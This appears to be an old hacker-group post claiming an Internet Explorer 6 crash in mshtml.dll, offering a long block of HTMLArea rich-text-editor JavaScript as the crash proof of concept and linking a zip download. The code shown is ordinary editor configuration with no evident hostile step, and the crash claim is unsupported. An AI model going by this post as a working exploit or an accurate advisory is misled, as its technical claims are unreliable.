Microsoft Internet Explorer Multiple Vulnerabilities(mshtml.dll) Discovered by:SaiedHacker Company of Program:Microsoft Tested On:Internet explorer 6.0.2900.2180 member of group:Siahacking,ArshamHacker,RHDS to find how IE crached you shoud type this code into a HTML file and save that after typing these codes into a JS file: _editor_url = "editor/"; if (typeof _editor_url == "string") { _editor_url = _editor_url.replace(/\x2f*$/, '/'); } else { alert("WARNING: _editor_url is not set! You should set this variable to the editor files path; it should preferably be an absolute path, like in '/Saiedhacker', but it can be relative if you prefer. Further we will try to load the editor files correctly but we'll probably fail."); } if (typeof _editor_lang == "string") { _editor_lang = _editor_lang.toLowerCase(); } else { _editor_lang = "en"; } function HTMLArea(textarea, config) { if (HTMLArea.checkSupportedBrowser()) { if (typeof config == "undefined") { this.config = new HTMLArea.Config(); } else { this.config = config; } this._htmlArea = null; this._textArea = textarea; this._editMode = "wysiwyg"; this.plugins = {}; this._timerToolbar = null; this._timerUndo = setInterval(function() { if(config._doc) config._undoTakeSnapshot(); }, this.config.undoTimeout); this._undoQueue = new Array(); this._undoPos = -1; this._customUndo = true; this._mdoc = document; this.doctype = ''; } }; ( function() { var scripts = HTMLArea._scripts = [ _editor_url + "htmlarea.js", _editor_url + "dialog.js", _editor_url + "popupwin.js", _editor_url + "lang/" + _editor_lang + ".js" ]; var head = document.getElementsByTagName("head")[0]; for (var i = 1; i < scripts.length; ++i) { var script = document.createElement("script"); script.src = scripts[i]; head.appendChild(script); } } )(); HTMLArea.RE_tagName = /(<\/|<)\s*([^ \t\n>]+)/ig; HTMLArea.RE_doctype = /()\n?/i; HTMLArea.RE_head = /((.|\n)*?)<\/head>/i; HTMLArea.RE_body = /((.|\n)*?)<\/body>/i; HTMLArea.Config = function () { this.version = "3.0"; this.width = "auto"; this.height = "auto"; this.statusBar = false; this.undoSteps = 20; this.undoTimeout = 500; this.sizeIncludesToolbar = true; this.fullPage = false; this.pageStyle = ""; this.killWordOnPaste = false; this.baseURL = document.baseURI || document.URL; if (this.baseURL && this.baseURL.match(/(.*)\/([^\/]+)/)) this.baseURL = RegExp.$1 + "/"; this.imgURL = "images/"; this.popupURL = "popups/"; this.toolbar = [ [ "fontname", "space", "fontsize", "space", "formatblock", "space", "bold", "italic", "underline", "strikethrough", "separator", "subscript", "superscript", "separator", "copy", "cut", "paste", "space", "undo", "redo" ], [ "justifyleft", "justifycenter", "justifyright", "justifyfull", "separator", "lefttoright", "righttoleft", "separator", "insertorderedlist", "insertunorderedlist", "outdent", "indent", "separator", "forecolor", "hilitecolor", "separator", "inserthorizontalrule", "createlink", "insertimage", "inserttable", "htmlmode", "separator", "popupeditor", "separator", "showhelp", "about" ] ]; this.fontname = { "Arial": 'arial,helvetica,sans-serif', "Courier New": 'courier new,courier,monospace', "Georgia": 'georgia,times new roman,times,serif', "Tahoma": 'tahoma,arial,helvetica,sans-serif', "Times New Roman": 'times new roman,times,serif', "Verdana": 'verdana,arial,helvetica,sans-serif', "impact": 'impact', "WingDings": 'wingdings' }; this.fontsize = { "1 (8 pt)": "1", "2 (10 pt)": "2", "3 (12 pt)": "3", "4 (14 pt)": "4", "5 (18 pt)": "5", "6 (24 pt)": "6", "7 (36 pt)": "7" }; this.formatblock = { "Heading 1": "h1", "Heading 2": "h2", "Heading 3": "h3", "Heading 4": "h4", "Heading 5": "h5", "Heading 6": "h6", "Normal": "p", "Address": "address", "Formatted": "pre" }; this.customSelects = {}; function cut_copy_paste(e, cmd, obj) { e.execCommand(cmd); }; this.btnList = { bold: [ "Bold", "ed_format_bold.gif", false, function(e) {e.execCommand("bold");} ], italic: [ "Italic", "ed_format_italic.gif", false, function(e) {e.execCommand("italic");} ], underline: [ "Underline", "ed_format_underline.gif", false, function(e) {e.execCommand("underline");} ], strikethrough: [ "Strikethrough", "ed_format_strike.gif", false, function(e) {e.execCommand("strikethrough");} ], justifyleft: [ "Justify Left", "ed_align_left.gif", false, function(e) {e.execCommand("justifyleft");} ], justifycenter: [ "Justify Center", "ed_align_center.gif", false, function(e) {e.execCommand("justifycenter");} ], justifyright: [ "Justify Right", "ed_align_right.gif", false, function(e) {e.execCommand("justifyright");} ], justifyfull: [ "Justify Full", "ed_align_justify.gif", false, function(e) {e.execCommand("justifyfull");} ], insertorderedlist: [ "Ordered List", "ed_list_num.gif", false, function(e) {e.execCommand("insertorderedlist");} ], insertunorderedlist: [ "Bulleted List", "ed_list_bullet.gif", false, function(e) {e.execCommand("insertunorderedlist");} ], outdent: [ "Decrease Indent", "ed_indent_more.gif", false, function(e) {e.execCommand("outdent");} ], indent: [ "Increase Indent", "ed_indent_less.gif", false, function(e) {e.execCommand("indent");} ], forecolor: [ "Font Color", "ed_color_fg.gif", false, function(e) {e.execCommand("forecolor");} ], hilitecolor: [ "Background Color", "ed_color_bg.gif", false, function(e) {e.execCommand("hilitecolor");} ], createlink: [ "Insert Web Link", "ed_link.gif", false, function(e) {e.execCommand("createlink", true);} ], insertimage: [ "Insert/Modify Image", "ed_image.gif", false, function(e) {e.execCommand("insertimage");} ], htmlmode: [ "Toggle HTML Source", "ed_html.gif", true, function(e) {e.execCommand("htmlmode");} ], undo: [ "Undoes your last action", "ed_undo.gif", false, function(e) {e.execCommand("undo");} ], redo: [ "Redoes your last action", "ed_redo.gif", false, function(e) {e.execCommand("redo");} ], cut: [ "Cut selection", "ed_cut.gif", false, cut_copy_paste ], copy: [ "Copy selection", "ed_copy.gif", false, cut_copy_paste ], paste: [ "Paste from clipboard", "ed_paste.gif", false, cut_copy_paste ], lefttoright: [ "Direction left to right", "ed_left_to_right.gif", false, function(e) {e.execCommand("lefttoright");} ], smiley: [ "smiley", "ed_smiley.gif", false, function(e) {e.execCommand("smiley");} ], save: [ "save", "ed_save.gif", false, function(e) {e.execCommand("save");} ], lang: [ "language", "ed_en.gif", false, function(e) {e.execCommand("lang");} ], righttoleft: [ "Direction right to left", "ed_right_to_left.gif", false, function(e) {e.execCommand("righttoleft");} ] }; for (var i in this.btnList) { var btn = this.btnList[i]; btn[1] = _editor_url + this.imgURL + btn[1]; if (typeof HTMLArea.I18N.tooltips[i] != "undefined") { btn[0] = HTMLArea.I18N.tooltips[i]; } } }; finally when you run the html file you see that internet explorer cant run those codes and craches very fast. for downloading these codes you can go to http://www.freewebtown.com/saiedhacker/Hacking.zip Have time of your life HackeranShiraz Security Team SaiedHackerIran@Yahoo.Com www.SaiedHackerPro.PersianBlog.Com --------------------------------- Get your own web address. Have a HUGE year through Yahoo! Small Business.